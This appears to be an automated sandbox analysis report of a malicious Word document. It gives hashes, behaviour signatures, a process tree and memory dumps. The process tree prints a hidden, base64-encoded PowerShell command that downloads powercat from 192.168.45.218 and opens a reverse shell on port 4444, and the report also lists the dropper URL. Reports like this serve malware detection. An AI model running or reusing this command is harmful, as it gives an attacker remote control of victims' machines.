Analysis

  • max time kernel
    54s
  • max time network
    17s
  • platform
    windows7_x64
  • resource
    win7-20240708-en
  • resource tags

    arch:x64arch:x86image:win7-20240708-enlocale:en-usos:windows7-x64system
  • submitted
    22-07-2024 21:58

General

  • Target

    a474f85bae9fe1f702af66093264cac9be9f8eb9de88e6478ed81d4512dd2513.doc

  • Size

    30KB

  • MD5

    68bc25652d7c957bb2e38bf08cbc29b6

  • SHA1

    8aa49fd09dcad64e112ebcf9736d6922b60175c9

  • SHA256

    a474f85bae9fe1f702af66093264cac9be9f8eb9de88e6478ed81d4512dd2513

  • SHA512

    d9e87f1d2aea6ee8c2100da6c40a8f2f38075d8dedabf1e408f06ad7813686f6e624d60f71f710e330a1bf779c575b48b8d033c740bbee0db1c28af7f52dd3fd

  • SSDEEP

    192:OaIlLZEvA+6/6rNavrgYjk+4bWlMYTxsud3cvP+rDBLg0jw2tqflTXPa:TE8iSwvxjk+tMYN30P+rDZg0j/tq9

Score
10/10

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
ps1.dropper

http://192.168.45.218/powercat.ps1

Signatures

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

    Run Powershell and hide display window.

  • Drops file in Windows directory 1 IoCs
  • Office loads VBA resources, possible macro or embedded object present
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of SetWindowsHookEx 2 IoCs
  • Suspicious use of WriteProcessMemory 8 IoCs

Processes

  • C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE
    "C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\a474f85bae9fe1f702af66093264cac9be9f8eb9de88e6478ed81d4512dd2513.doc"
    1⤵
    • Drops file in Windows directory
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:1984
    • C:\Windows\splwow64.exe
      C:\Windows\splwow64.exe 12288
      2⤵
        PID:2464
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -nop -w hidden -enc SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAOgAvAC8AMQA5ADIALgAxADYAOAAuADQANQAuADIAMQA4AC8AcABvAHcAZQByAGMAYQB0AC4AcABzADEAJwApADsAcABvAHcAZQByAGMAYQB0ACAALQBjACAAMQA5ADIALgAxADYAOAAuADQANQAuADIAMQA4ACAALQBwACAANAA0ADQANAAgAC0AZQAgAHAAbwB3AGUAcgBzAGgAZQBsAGwA
        2⤵
        • Process spawned unexpected child process
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:2848

    Network

    MITRE ATT&CK Enterprise v15

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • memory/1984-0-0x000000002F2C1000-0x000000002F2C2000-memory.dmp

      Filesize

      4KB

    • memory/1984-1-0x000000005FFF0000-0x0000000060000000-memory.dmp

      Filesize

      64KB

    • memory/1984-2-0x000000007181D000-0x0000000071828000-memory.dmp

      Filesize

      44KB

    • memory/1984-4-0x0000000000310000-0x0000000000410000-memory.dmp

      Filesize

      1024KB

    • memory/1984-14-0x0000000000310000-0x0000000000410000-memory.dmp

      Filesize

      1024KB

    • memory/1984-10-0x0000000000310000-0x0000000000410000-memory.dmp

      Filesize

      1024KB

    • memory/1984-7-0x0000000000310000-0x0000000000410000-memory.dmp

      Filesize

      1024KB

    • memory/1984-6-0x0000000000310000-0x0000000000410000-memory.dmp

      Filesize

      1024KB

    • memory/1984-5-0x0000000000310000-0x0000000000410000-memory.dmp

      Filesize

      1024KB

    • memory/1984-18-0x000000007181D000-0x0000000071828000-memory.dmp

      Filesize

      44KB

    • memory/1984-19-0x0000000000310000-0x0000000000410000-memory.dmp

      Filesize

      1024KB